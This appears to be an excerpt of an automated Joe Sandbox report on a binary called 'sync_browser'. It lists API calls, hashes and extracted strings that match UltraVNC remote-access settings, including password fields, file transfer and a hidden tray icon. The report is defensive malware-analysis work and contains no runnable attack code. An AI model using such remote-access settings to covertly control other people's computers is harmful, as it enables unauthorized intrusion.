Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Sleep_errno
String ID:
API String ID: 1068366078-0
Opcode ID: e0fad309830d1d7079ffb5554beb775af7228a8f16d0edcc9117263fd617f576
Instruction ID: 170572fbc21df7c06b752e9d234302febee656cf58485f898f3984986e7b1946
Opcode Fuzzy Hash: e0fad309830d1d7079ffb5554beb775af7228a8f16d0edcc9117263fd617f576
Instruction Fuzzy Hash: 19014F22A2CA81C5EA58BB17984006DF6A5EB88BD0B991131DE5D07BA5CF38F991CB00

Non-executed Functions

Function 00007FF7400081AD Relevance: 463.1, APIs: 192, Strings: 72, Instructions: 1063COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF74000D390: GetModuleFileNameA.KERNEL32 ref: 00007FF74000D3BB

Part of subcall function 00007FF74000D480: GetModuleFileNameA.KERNEL32 ref: 00007FF74000D4AB

Part of subcall function 00007FF7400B7DE8: _errno.LIBCMT ref: 00007FF7400B7E00
Part of subcall function 00007FF7400B7DE8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7400B7E0C

GetPrivateProfileIntA.KERNEL32 ref: 00007FF740008270
wsprintfA.USER32 ref: 00007FF740008290
WritePrivateProfileStringA.KERNEL32 ref: 00007FF7400082B0
GetLastError.KERNEL32 ref: 00007FF7400082BA

Part of subcall function 00007FF74000A040: OpenInputDesktop.USER32(?,?,?,00007FF7400082D7), ref: 00007FF74000A07A
Part of subcall function 00007FF74000A040: GetCurrentThreadId.KERNEL32 ref: 00007FF74000A083
Part of subcall function 00007FF74000A040: GetThreadDesktop.USER32(?,?,?,00007FF7400082D7), ref: 00007FF74000A08B
Part of subcall function 00007FF74000A040: SetThreadDesktop.USER32(?,?,?,00007FF7400082D7), ref: 00007FF74000A0A6
Part of subcall function 00007FF74000A040: MessageBoxA.USER32 ref: 00007FF74000A0B7
Part of subcall function 00007FF74000A040: SetThreadDesktop.USER32(?,?,?,00007FF7400082D7), ref: 00007FF74000A0C2
Part of subcall function 00007FF74000A040: CloseDesktop.USER32(?,?,?,00007FF7400082D7), ref: 00007FF74000A0CB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF740008309
wsprintfA.USER32 ref: 00007FF740008320
WritePrivateProfileStringA.KERNEL32 ref: 00007FF740008340
GetPrivateProfileIntA.KERNEL32 ref: 00007FF74000835B
wsprintfA.USER32 ref: 00007FF740008372
WritePrivateProfileStringA.KERNEL32 ref: 00007FF740008392
GetPrivateProfileStringA.KERNEL32 ref: 00007FF7400083C1
GetPrivateProfileStringA.KERNEL32 ref: 00007FF7400083F0
GetPrivateProfileStringA.KERNEL32 ref: 00007FF74000841F
WritePrivateProfileStringA.KERNEL32 ref: 00007FF74000843B
WritePrivateProfileStringA.KERNEL32 ref: 00007FF740008457
WritePrivateProfileStringA.KERNEL32 ref: 00007FF740008473
GetPrivateProfileIntA.KERNEL32 ref: 00007FF74000848E
GetPrivateProfileIntA.KERNEL32 ref: 00007FF7400084AB
GetPrivateProfileIntA.KERNEL32 ref: 00007FF7400084C8
wsprintfA.USER32 ref: 00007FF7400084E1
WritePrivateProfileStringA.KERNEL32 ref: 00007FF740008501

Strings

clearconsole, xrefs: 00007FF740009308, 00007FF74000945B
DSMPlugin, xrefs: 00007FF74000892F, 00007FF740008986
QuerySetting, xrefs: 00007FF740009075, 00007FF740009109
path, xrefs: 00007FF7400085C3, 00007FF7400086E8
DebugLevel, xrefs: 00007FF74000861B, 00007FF74000873F
AuthRequired, xrefs: 00007FF740008800, 00007FF7400088CD
passwd2, xrefs: 00007FF740009225, 00007FF740009255
LockSetting, xrefs: 00007FF740009293, 00007FF74000937F
EnableDriver, xrefs: 00007FF74000953F, 00007FF740009795
SingleWindow, xrefs: 00007FF74000959B, 00007FF740009840
DebugMode, xrefs: 00007FF740008579, 00007FF740008691
group1, xrefs: 00007FF7400083A8, 00007FF74000842A
Permission denied:Uncheck [_] Protect my computer... in run as dialog or use user with write permission., xrefs: 00007FF7400082C5
locdom2, xrefs: 00007FF740008498, 00007FF74000852A
ConnectPriority, xrefs: 00007FF740008820, 00007FF740008904
AllowEditClients, xrefs: 00007FF740008A4B, 00007FF740008AFA
MaxCpu, xrefs: 00007FF740009521, 00007FF74000975E, 00007FF740009878, 00007FF7400098B2
poll, xrefs: 00007FF74000947A, 00007FF740009495, 00007FF7400094B2, 00007FF7400094CF, 00007FF7400094EC, 00007FF74000950D, 00007FF740009528, 00007FF740009546, 00007FF740009565, 00007FF740009583, 00007FF7400095A2, 00007FF7400095D8, 00007FF740009617, 00007FF74000964E, 00007FF740009685, 00007FF7400096BC, 00007FF7400096F3, 00007FF74000972A, 00007FF740009765, 00007FF74000979C, 00007FF7400097D5, 00007FF74000980E, 00007FF740009847, 00007FF740009867, 00007FF74000987F, 00007FF7400098B9
XDMCPConnect, xrefs: 00007FF740008DAF, 00007FF740008ED9
AuthHosts, xrefs: 00007FF74000895B, 00007FF74000899F
BlankMonitorEnabled, xrefs: 00007FF740008B50, 00007FF740008C7D
QueryIfNoLogon, xrefs: 00007FF7400090CA, 00007FF7400091AE
admin, xrefs: 00007FF740008259, 00007FF7400082A9, 00007FF7400082EF, 00007FF740008339, 00007FF740008351, 00007FF74000838B, 00007FF740008580, 00007FF74000859B, 00007FF7400085CF, 00007FF740008602, 00007FF740008622, 00007FF74000863D, 00007FF74000865A, 00007FF740008698, 00007FF7400086CF, 00007FF7400086EF, 00007FF74000870F, 00007FF740008746, 00007FF74000877D, 00007FF7400087B4, 00007FF7400087CC, 00007FF7400087E7, 00007FF740008807, 00007FF740008827, 00007FF740008866, 00007FF74000889D, 00007FF7400088D4, 00007FF74000890B, 00007FF740008936, 00007FF740008962, 00007FF74000898D, 00007FF7400089A6, 00007FF7400089D4, 00007FF7400089FC, 00007FF740008A14, 00007FF740008A3A, 00007FF740008A52, 00007FF740008A93, 00007FF740008ACA, 00007FF740008B01, 00007FF740008B19, 00007FF740008B37, 00007FF740008B57, 00007FF740008B77, 00007FF740008B94, 00007FF740008BB5, 00007FF740008BD6, 00007FF740008C16, 00007FF740008C4D, 00007FF740008C84, 00007FF740008CBB, 00007FF740008CF2, 00007FF740008D29, 00007FF740008D60, 00007FF740008D78, 00007FF740008D96, 00007FF740008DB6, 00007FF740008DDE, 00007FF740008DF6, 00007FF740008E14, 00007FF740008E32, 00007FF740008E72, 00007FF740008EA9, 00007FF740008EE0, 00007FF740008F17, 00007FF740008F4E, 00007FF740008F85, 00007FF740008FBC, 00007FF740008FD4, 00007FF740008FEF, 00007FF74000902D, 00007FF740009064, 00007FF74000907C, 00007FF740009097, 00007FF7400090B4, 00007FF7400090D1, 00007FF740009110, 00007FF740009147, 00007FF74000917E, 00007FF7400091B5, 00007FF74000927F, 00007FF74000929A, 00007FF7400092B7, 00007FF7400092D4, 00007FF7400092F1, 00007FF74000930F, 00007FF74000934F, 00007FF740009386, 00007FF7400093BD, 00007FF7400093F4, 00007FF74000942B, 00007FF740009462
RemoveAero, xrefs: 00007FF740008FE8, 00007FF74000905D
MSLogonRequired, xrefs: 00007FF7400082E8, 00007FF740008332
AllowShutdown, xrefs: 00007FF740008A0D, 00007FF740008A8C
primary, xrefs: 00007FF740008BAE, 00007FF740008D22
IdleTimeout, xrefs: 00007FF740008E2B, 00007FF740008FB5
OnlyPollConsole, xrefs: 00007FF7400094E5, 00007FF7400096EC
RemoveWallpaper, xrefs: 00007FF740008FCD, 00007FF740009026
DisableTrayIcon, xrefs: 00007FF740008636, 00007FF740008776
FileTransferEnabled, xrefs: 00007FF740008B12, 00007FF740008C0F
group2, xrefs: 00007FF7400083D7, 00007FF740008446
group3, xrefs: 00007FF740008406, 00007FF740008462
QueryAccept, xrefs: 00007FF7400090AD, 00007FF740009177
QueryTimeout, xrefs: 00007FF740009090, 00007FF740009140
PortNumber, xrefs: 00007FF740008DEF, 00007FF740008F47
LocalInputsDisabled, xrefs: 00007FF7400092B0, 00007FF7400093B6
AllowProperties, xrefs: 00007FF740008A33, 00007FF740008AC3
BlankInputsOnly, xrefs: 00007FF740008B70, 00007FF740008CB4
TurboMode, xrefs: 00007FF740009473, 00007FF740009610
NewMSLogon, xrefs: 00007FF74000834A, 00007FF740008384
Avilog, xrefs: 00007FF740008594, 00007FF7400086C8
OnlyPollOnEvent, xrefs: 00007FF740009506, 00007FF740009723
secondary, xrefs: 00007FF740008BCF, 00007FF740008D59
EnableVirtual, xrefs: 00007FF74000957C, 00007FF740009807
SocketConnect, xrefs: 00007FF740008D71, 00007FF740008E6B
admin_auth, xrefs: 00007FF7400083AF, 00007FF7400083DE, 00007FF74000840D, 00007FF740008431, 00007FF74000844D, 00007FF740008469, 00007FF740008484, 00007FF74000849F, 00007FF7400084BC, 00007FF7400084FA, 00007FF740008531, 00007FF740008568
locdom1, xrefs: 00007FF74000847D, 00007FF7400084F3
UseRegistry, xrefs: 00007FF740008252, 00007FF7400082A2
UltraVNC, xrefs: 00007FF7400091D4, 00007FF7400091FF, 00007FF74000922C, 00007FF74000925C
HTTPConnect, xrefs: 00007FF740008D8F, 00007FF740008EA2
AutoPortSelect, xrefs: 00007FF740008DD7, 00007FF740008F10
InputsEnabled, xrefs: 00007FF740009278, 00007FF740009348
PollUnderCursor, xrefs: 00007FF74000948E, 00007FF740009647
AllowLoopback, xrefs: 00007FF7400087E0, 00007FF740008896
locdom3, xrefs: 00007FF7400084B5, 00007FF740008561
UseDSMPlugin, xrefs: 00007FF7400087C5, 00007FF74000885F
, xrefs: 00007FF7400095DF
SingleWindowName, xrefs: 00007FF7400095CC, 00007FF740009860
DefaultScale, xrefs: 00007FF740008B8D, 00007FF740008CEB
kickrdp, xrefs: 00007FF7400092EA, 00007FF740009424
EnableJapInput, xrefs: 00007FF7400092CD, 00007FF7400093ED
PollFullScreen, xrefs: 00007FF7400094C8, 00007FF7400096B5
LoopbackOnly, xrefs: 00007FF740008653, 00007FF7400087AD
DSMPluginConfig, xrefs: 00007FF7400089CD, 00007FF7400089F5
FTUserImpersonation, xrefs: 00007FF740008B30, 00007FF740008C46
PollForeground, xrefs: 00007FF7400094AB, 00007FF74000967E
EnableHook, xrefs: 00007FF74000955E, 00007FF7400097CE
passwd, xrefs: 00007FF7400091CD, 00007FF7400091F8
HTTPPortNumber, xrefs: 00007FF740008E0D, 00007FF740008F7E
accept_reject_mesg, xrefs: 00007FF7400085FB, 00007FF740008708

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfile$String$Write$Desktop$Threadwsprintf$FileModuleName$CloseCurrentErrorInputLastMessageOpen_errno_invalid_parameter_noinfo
String ID: $AllowEditClients$AllowLoopback$AllowProperties$AllowShutdown$AuthHosts$AuthRequired$AutoPortSelect$Avilog$BlankInputsOnly$BlankMonitorEnabled$ConnectPriority$DSMPlugin$DSMPluginConfig$DebugLevel$DebugMode$DefaultScale$DisableTrayIcon$EnableDriver$EnableHook$EnableJapInput$EnableVirtual$FTUserImpersonation$FileTransferEnabled$HTTPConnect$HTTPPortNumber$IdleTimeout$InputsEnabled$LocalInputsDisabled$LockSetting$LoopbackOnly$MSLogonRequired$MaxCpu$NewMSLogon$OnlyPollConsole$OnlyPollOnEvent$Permission denied:Uncheck [_] Protect my computer... in run as dialog or use user with write permission.$PollForeground$PollFullScreen$PollUnderCursor$PortNumber$QueryAccept$QueryIfNoLogon$QuerySetting$QueryTimeout$RemoveAero$RemoveWallpaper$SingleWindow$SingleWindowName$SocketConnect$TurboMode$UltraVNC$UseDSMPlugin$UseRegistry$XDMCPConnect$accept_reject_mesg$admin$admin_auth$clearconsole$group1$group2$group3$kickrdp$locdom1$locdom2$locdom3$passwd$passwd2$path$poll$primary$secondary
API String ID: 634683900-3478490838
Opcode ID: 2effa7899f974a3009ccd12de8866d22f8568e5a4afa6748285aa8aa378eceda
Instruction ID: 1dc2c79d0a2d232b9ba0d1e44135993381d828cc414b8a164caa09b8c9797cce
Opcode Fuzzy Hash: 2effa7899f974a3009ccd12de8866d22f8568e5a4afa6748285aa8aa378eceda
Instruction Fuzzy Hash: 7FE29F61A0CA8FE5EB10BF64E8509E8A321FB54788FC05032D55D57A78DE7CF64AC7A0

Function 00007FF74000E1D0 Relevance: 457.8, APIs: 190, Strings: 71, Instructions: 1023COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7400B7978: malloc.LIBCMT ref: 00007FF7400B7992

Part of subcall function 00007FF7400B7978: _callnewh.LIBCMT ref: 00007FF7400B7986

GetPrivateProfileIntA.KERNEL32 ref: 00007FF74000E253
wsprintfA.USER32 ref: 00007FF74000E268
WritePrivateProfileStringA.KERNEL32 ref: 00007FF74000E284
GetLastError.KERNEL32 ref: 00007FF74000E28E
_itow.LIBCMT ref: 00007FF74000E2A1

Part of subcall function 00007FF7400B95C0: xtoa.LIBCMT ref: 00007FF7400B95DC

Part of subcall function 00007FF74000A040: OpenInputDesktop.USER32(?,?,?,00007FF7400082D7), ref: 00007FF74000A07A
Part of subcall function 00007FF74000A040: GetCurrentThreadId.KERNEL32 ref: 00007FF74000A083
Part of subcall function 00007FF74000A040: GetThreadDesktop.USER32(?,?,?,00007FF7400082D7), ref: 00007FF74000A08B
Part of subcall function 00007FF74000A040: SetThreadDesktop.USER32(?,?,?,00007FF7400082D7), ref: 00007FF74000A0A6
Part of subcall function 00007FF74000A040: MessageBoxA.USER32 ref: 00007FF74000A0B7
Part of subcall function 00007FF74000A040: SetThreadDesktop.USER32(?,?,?,00007FF7400082D7), ref: 00007FF74000A0C2
Part of subcall function 00007FF74000A040: CloseDesktop.USER32(?,?,?,00007FF7400082D7), ref: 00007FF74000A0CB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF74000E2E2
wsprintfA.USER32 ref: 00007FF74000E2F7
WritePrivateProfileStringA.KERNEL32 ref: 00007FF74000E313
GetPrivateProfileIntA.KERNEL32 ref: 00007FF74000E32D
wsprintfA.USER32 ref: 00007FF74000E342
WritePrivateProfileStringA.KERNEL32 ref: 00007FF74000E35E
GetPrivateProfileStringA.KERNEL32 ref: 00007FF74000E389
GetPrivateProfileStringA.KERNEL32 ref: 00007FF74000E3B4
GetPrivateProfileStringA.KERNEL32 ref: 00007FF74000E3DF
WritePrivateProfileStringA.KERNEL32 ref: 00007FF74000E3F9
WritePrivateProfileStringA.KERNEL32 ref: 00007FF74000E413
WritePrivateProfileStringA.KERNEL32 ref: 00007FF74000E42D
GetPrivateProfileIntA.KERNEL32 ref: 00007FF74000E447
GetPrivateProfileIntA.KERNEL32 ref: 00007FF74000E463
GetPrivateProfileIntA.KERNEL32 ref: 00007FF74000E47F
wsprintfA.USER32 ref: 00007FF74000E496
WritePrivateProfileStringA.KERNEL32 ref: 00007FF74000E4B2
wsprintfA.USER32 ref: 00007FF74000E4C7

Strings

clearconsole, xrefs: 00007FF74000F1B3, 00007FF74000F2E2
DSMPlugin, xrefs: 00007FF74000E877, 00007FF74000E8CC
QuerySetting, xrefs: 00007FF74000EF4E, 00007FF74000EFE5
path, xrefs: 00007FF74000E55B, 00007FF74000E669
DebugLevel, xrefs: 00007FF74000E5AE, 00007FF74000E6B8
AuthRequired, xrefs: 00007FF74000E76A, 00007FF74000E824
passwd2, xrefs: 00007FF74000F0DF, 00007FF74000F106
LockSetting, xrefs: 00007FF74000F142, 00007FF74000F21E
EnableDriver, xrefs: 00007FF74000F3D1, 00007FF74000F5FB
SingleWindow, xrefs: 00007FF74000F433, 00007FF74000F694
DebugMode, xrefs: 00007FF74000E51A, 00007FF74000E620
group1, xrefs: 00007FF74000E36B, 00007FF74000E3E5
locdom2, xrefs: 00007FF74000E44D, 00007FF74000E4D2
ConnectPriority, xrefs: 00007FF74000E789, 00007FF74000E855
AllowEditClients, xrefs: 00007FF74000E939, 00007FF74000E9D6
MaxCpu, xrefs: 00007FF74000F3AC, 00007FF74000F5C8
poll, xrefs: 00007FF74000F305, 00007FF74000F322, 00007FF74000F33E, 00007FF74000F35A, 00007FF74000F379, 00007FF74000F39C, 00007FF74000F3B3, 00007FF74000F3D8, 00007FF74000F3F7, 00007FF74000F41A, 00007FF74000F43A, 00007FF74000F46E, 00007FF74000F4A9, 00007FF74000F4DA, 00007FF74000F50B, 00007FF74000F53C, 00007FF74000F56D, 00007FF74000F59E, 00007FF74000F5CF, 00007FF74000F602, 00007FF74000F635, 00007FF74000F668, 00007FF74000F69B, 00007FF74000F6B6
XDMCPConnect, xrefs: 00007FF74000ECB2, 00007FF74000EDD1
AuthHosts, xrefs: 00007FF74000E8A4, 00007FF74000E8E3
BlankMonitorEnabled, xrefs: 00007FF74000EA29, 00007FF74000EB62
QueryIfNoLogon, xrefs: 00007FF74000EFA9, 00007FF74000F078
admin, xrefs: 00007FF74000E241, 00007FF74000E27A, 00007FF74000E2C5, 00007FF74000E309, 00007FF74000E320, 00007FF74000E354, 00007FF74000E521, 00007FF74000E53B, 00007FF74000E562, 00007FF74000E594, 00007FF74000E5B5, 00007FF74000E5CF, 00007FF74000E5EB, 00007FF74000E627, 00007FF74000E655, 00007FF74000E670, 00007FF74000E68E, 00007FF74000E6BF, 00007FF74000E6F0, 00007FF74000E721, 00007FF74000E738, 00007FF74000E752, 00007FF74000E771, 00007FF74000E790, 00007FF74000E7C9, 00007FF74000E7FA, 00007FF74000E82B, 00007FF74000E85C, 00007FF74000E87E, 00007FF74000E8AB, 00007FF74000E8D3, 00007FF74000E8EA, 00007FF74000E904, 00007FF74000E921, 00007FF74000E940, 00007FF74000E97B, 00007FF74000E9AC, 00007FF74000E9DD, 00007FF74000E9F4, 00007FF74000EA11, 00007FF74000EA30, 00007FF74000EA4F, 00007FF74000EA6B, 00007FF74000EA8B, 00007FF74000EAAB, 00007FF74000EAC8, 00007FF74000EB07, 00007FF74000EB3B, 00007FF74000EB69, 00007FF74000EB9A, 00007FF74000EBCB, 00007FF74000EBFF, 00007FF74000EC30, 00007FF74000EC61, 00007FF74000EC7D, 00007FF74000EC9A, 00007FF74000ECB9, 00007FF74000ECD8, 00007FF74000ECFD, 00007FF74000ED17, 00007FF74000ED37, 00007FF74000ED76, 00007FF74000EDA7, 00007FF74000EDD8, 00007FF74000EE09, 00007FF74000EE3A, 00007FF74000EE6B, 00007FF74000EEA2, 00007FF74000EEBB, 00007FF74000EED5, 00007FF74000EF0D, 00007FF74000EF3E, 00007FF74000EF55, 00007FF74000EF72, 00007FF74000EF91, 00007FF74000EFB0, 00007FF74000EFEC, 00007FF74000F01D, 00007FF74000F051, 00007FF74000F07F, 00007FF74000F12C, 00007FF74000F149, 00007FF74000F165, 00007FF74000F181, 00007FF74000F19D, 00007FF74000F1BA, 00007FF74000F1F7, 00007FF74000F225, 00007FF74000F256, 00007FF74000F287, 00007FF74000F2B8, 00007FF74000F2E9
RemoveAero, xrefs: 00007FF74000EECE, 00007FF74000EF37
MSLogonRequired, xrefs: 00007FF74000E2BE, 00007FF74000E302
AllowShutdown, xrefs: 00007FF74000E8FD, 00007FF74000E974
primary, xrefs: 00007FF74000EAA4, 00007FF74000EC29
IdleTimeout, xrefs: 00007FF74000ED30, 00007FF74000EE9B
OnlyPollConsole, xrefs: 00007FF74000F372, 00007FF74000F566
RemoveWallpaper, xrefs: 00007FF74000EEB4, 00007FF74000EF06
DisableTrayIcon, xrefs: 00007FF74000E5C8, 00007FF74000E6E9
FileTransferEnabled, xrefs: 00007FF74000E9ED, 00007FF74000EB00
group2, xrefs: 00007FF74000E396, 00007FF74000E3FF
FileTransferTimeout, xrefs: 00007FF74000EA84, 00007FF74000EBF8
group3, xrefs: 00007FF74000E3C1, 00007FF74000E419
QueryAccept, xrefs: 00007FF74000EF8A, 00007FF74000F04A
QueryTimeout, xrefs: 00007FF74000EF6B, 00007FF74000F016
PortNumber, xrefs: 00007FF74000ECF6, 00007FF74000EE33
, xrefs: 00007FF74000F475
LocalInputsDisabled, xrefs: 00007FF74000F15E, 00007FF74000F24F
AllowProperties, xrefs: 00007FF74000E91A, 00007FF74000E9A5
BlankInputsOnly, xrefs: 00007FF74000EA48, 00007FF74000EB93
TurboMode, xrefs: 00007FF74000F2FE, 00007FF74000F4A2
NewMSLogon, xrefs: 00007FF74000E319, 00007FF74000E34D
Avilog, xrefs: 00007FF74000E534, 00007FF74000E64E
OnlyPollOnEvent, xrefs: 00007FF74000F395, 00007FF74000F597
secondary, xrefs: 00007FF74000EAC1, 00007FF74000EC5A
EnableVirtual, xrefs: 00007FF74000F413, 00007FF74000F661
SocketConnect, xrefs: 00007FF74000EC76, 00007FF74000ED6F
admin_auth, xrefs: 00007FF74000E372, 00007FF74000E39D, 00007FF74000E3C8, 00007FF74000E3EC, 00007FF74000E406, 00007FF74000E420, 00007FF74000E43A, 00007FF74000E454, 00007FF74000E478, 00007FF74000E4A8, 00007FF74000E4D9, 00007FF74000E50A
locdom1, xrefs: 00007FF74000E433, 00007FF74000E4A1
UseRegistry, xrefs: 00007FF74000E23A, 00007FF74000E273
UltraVNC, xrefs: 00007FF74000F09B, 00007FF74000F0BF, 00007FF74000F0E6, 00007FF74000F10D
HTTPConnect, xrefs: 00007FF74000EC93, 00007FF74000EDA0
AutoPortSelect, xrefs: 00007FF74000ECD1, 00007FF74000EE02
InputsEnabled, xrefs: 00007FF74000F125, 00007FF74000F1F0
PollUnderCursor, xrefs: 00007FF74000F31B, 00007FF74000F4D3
AllowLoopback, xrefs: 00007FF74000E74B, 00007FF74000E7F3
locdom3, xrefs: 00007FF74000E471, 00007FF74000E503
UseDSMPlugin, xrefs: 00007FF74000E731, 00007FF74000E7C2
SingleWindowName, xrefs: 00007FF74000F462, 00007FF74000F6AF
DefaultScale, xrefs: 00007FF74000EA64, 00007FF74000EBC4
kickrdp, xrefs: 00007FF74000F196, 00007FF74000F2B1
EnableJapInput, xrefs: 00007FF74000F17A, 00007FF74000F280
PollFullScreen, xrefs: 00007FF74000F353, 00007FF74000F535
LoopbackOnly, xrefs: 00007FF74000E5E4, 00007FF74000E71A
FTUserImpersonation, xrefs: 00007FF74000EA0A, 00007FF74000EB34
PollForeground, xrefs: 00007FF74000F337, 00007FF74000F504
EnableHook, xrefs: 00007FF74000F3F0, 00007FF74000F62E
passwd, xrefs: 00007FF74000F094, 00007FF74000F0B8
HTTPPortNumber, xrefs: 00007FF74000ED10, 00007FF74000EE64
accept_reject_mesg, xrefs: 00007FF74000E58D, 00007FF74000E687

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfile$String$Write$Desktopwsprintf$Thread$CloseCurrentErrorInputLastMessageOpen_callnewh_itowmallocxtoa
String ID: $AllowEditClients$AllowLoopback$AllowProperties$AllowShutdown$AuthHosts$AuthRequired$AutoPortSelect$Avilog$BlankInputsOnly$BlankMonitorEnabled$ConnectPriority$DSMPlugin$DebugLevel$DebugMode$DefaultScale$DisableTrayIcon$EnableDriver$EnableHook$EnableJapInput$EnableVirtual$FTUserImpersonation$FileTransferEnabled$FileTransferTimeout$HTTPConnect$HTTPPortNumber$IdleTimeout$InputsEnabled$LocalInputsDisabled$LockSetting$LoopbackOnly$MSLogonRequired$MaxCpu$NewMSLogon$OnlyPollConsole$OnlyPollOnEvent$PollForeground$PollFullScreen$PollUnderCursor$PortNumber$QueryAccept$QueryIfNoLogon$QuerySetting$QueryTimeout$RemoveAero$RemoveWallpaper$SingleWindow$SingleWindowName$SocketConnect$TurboMode$UltraVNC$UseDSMPlugin$UseRegistry$XDMCPConnect$accept_reject_mesg$admin$admin_auth$clearconsole$group1$group2$group3$kickrdp$locdom1$locdom2$locdom3$passwd$passwd2$path$poll$primary$secondary
API String ID: 341937111-959611688
Opcode ID: 7e73647ecd3fa51fa072c6accf7da39f2f963580055068ff331c9971e3f9d7f8
Instruction ID: a5ae2c9d6d3beaa7c2c58961246c7aa89914d231bf6720f5496b12ffd7131add
Opcode Fuzzy Hash: 7e73647ecd3fa51fa072c6accf7da39f2f963580055068ff331c9971e3f9d7f8
Instruction Fuzzy Hash: D7C2E765A0CA4BE1EA00BB65F8508A4A360FF45798FC05432D95E6777CEE7CF249C7A0

Function 00007FF74001A130 Relevance: 79.1, APIs: 28, Strings: 17, Instructions: 317threadregistrysleepCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF74001A176
OpenInputDesktop.USER32 ref: 00007FF74001A186
GetCurrentThreadId.KERNEL32 ref: 00007FF74001A1B0
GetThreadDesktop.USER32 ref: 00007FF74001A1B8
GetUserObjectInformationA.USER32 ref: 00007FF74001A1E9
SetThreadDesktop.USER32 ref: 00007FF74001A231
OpenProcess.KERNEL32 ref: 00007FF74001A2B4
OpenProcessToken.ADVAPI32 ref: 00007FF74001A2D3
CloseHandle.KERNEL32 ref: 00007FF74001A2E0
GetModuleFileNameA.KERNEL32 ref: 00007FF74001A2FA
CreateProcessAsUserA.ADVAPI32 ref: 00007FF74001A3C9
GetLastError.KERNEL32 ref: 00007FF74001A3CF
CloseHandle.KERNEL32 ref: 00007FF74001A3E0
CloseHandle.KERNEL32 ref: 00007FF74001A3EF
OpenEventA.KERNEL32 ref: 00007FF74001A420
SetEvent.KERNEL32 ref: 00007FF74001A439
RegOpenKeyExA.ADVAPI32 ref: 00007FF74001A46A
RegQueryValueExA.ADVAPI32 ref: 00007FF74001A4A2
RegCloseKey.ADVAPI32 ref: 00007FF74001A4AD
OpenEventA.KERNEL32 ref: 00007FF74001A4D8
SetEvent.KERNEL32 ref: 00007FF74001A4F1
GetModuleFileNameA.KERNEL32 ref: 00007FF74001A50B
GetDesktopWindow.USER32 ref: 00007FF74001A5A4
ShellExecuteA.SHELL32 ref: 00007FF74001A5CF
InitializeCriticalSection.KERNEL32 ref: 00007FF74001A627
Sleep.KERNEL32 ref: 00007FF74001A693
SetThreadDesktop.USER32 ref: 00007FF74001A6A1
CloseDesktop.USER32 ref: 00007FF74001A6AF

Strings

Ctrl-alt-del require service, no permission, xrefs: 00007FF74001A656
vistahook.cpp : !GetUserObjectInformation , xrefs: 00007FF74001A1F3
vistahook.cpp : SelectHDESK to %s (%x) from %x, xrefs: 00007FF74001A219
open, xrefs: 00007FF74001A5C8
Winsta0\Default, xrefs: 00007FF74001A37A
vistahook.cpp : SelectHDESK:!SetThreadDesktop , xrefs: 00007FF74001A23B
Warning, xrefs: 00007FF74001A27C
